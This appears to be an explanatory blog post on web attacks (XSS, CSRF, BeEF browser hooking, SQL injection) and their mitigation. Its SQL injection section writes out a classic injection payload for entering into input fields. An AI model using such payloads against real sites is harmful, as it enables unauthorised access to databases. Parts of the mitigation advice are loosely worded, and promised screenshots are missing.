Black hat hackers as they’re popularly known, hunt for vulnerabilities that exploits can be created for. These exploits can be used to attack the web server or user’s browser. These are categorized as “client side” & “server side” attacks.
Sometimes the attacker may not need to attack the user directly with a phishing link. Sometimes if the web application is vulnerable enough, they can embed malicious code into the web servers’ web root, configuration file, or a vulnerable input field.
Cross-site Scripting (XSS)
If this happens on a website that takes care of sensitive user information like financial data, this information can be stolen. In worst cases scenarios, XSS can be used to modify or reproduce malware as a worm virus.
Another attack referred to as cross-site request forgery (CSRF) is also popular to attackers. This is a type of attack in which a logged in user session with an application is forged on the attacker’s side, making it possible for the hacker to make forged requests to that application on the user’s behalf. This can lead to fraudulent transfer of funds, account setting changes, and device or browser compromise.
A popular tool that hackers use are the browser exploitation framework (BeEF). BeEF uses a browser based admin page where you can control or send social engineering attacks to the victim’s browser. What needs to happen before the hacker can do this however, is the victim needs to click on a malicious phishing link or attachment first. This will “hook” the victim browser, allowing the attacker control over it. This “hook” is also called a BeEF hook.
Once a browser is hooked, BeEF can be used for:
- Speaking or recording voice or video via webcam
- Sending pop-up messages to the browser
- Redirecting the user to impersonated login web pages
- Viewing browser history, saved user credentials for logins, and cookies
Here are a few screenshots of BeEF.
SQL Injection (SQLi)
Structured Query Language injection attacks are very sophisticated. Hackers may be able to initiate malicious queries against the database for your site. The database will sometimes be an SQL, NoSQL, MariaDB, or OracleDB database. These databases store information in databases, tables, and columns. The information you might see is a list of usernames or product ID’s.
Here’s an example of this kind of attack.
A command like ‘ or 1=1– evaluates to a true constant and returns all rows in the table when successful (if the database is vulnerable). This query can be input into any and all user input fields for testing.
How Do I Mitigate XSS and Save my Browser?
XSS attacks can be mitigated which is the good news. The web application can validate form fields and by not allowing a user to directly enter input on the web page.
How do I validate form fields? Frameworks assist in making sure that user-submitted forms are filtering out non-safe characters. A typical example is Django’s built-in field classes. They provide fields that approve some commonly used types and point out normal defaults.
On the client’s side there are things you can do to avoid falling victim to XSS. This includes not clicking any phishing link or attachment that you haven’t verified, giving out personal information to websites, phone callers, or strangers that message you out of the blue, and downloading less than legitimate software.
Antivirus tools can’t prevent every XSS client attack from happening. This means a lot of vigilance must be practiced on the user side. Using security best practices, you should be safe for many scenarios.
However, enterprises can implement strict controls such as Content Security Policy (CSP), cross-origin resource sharing (CORS), and same-origin policy (SOP). These policies can be integrated into the development process., making the application much more robust than others.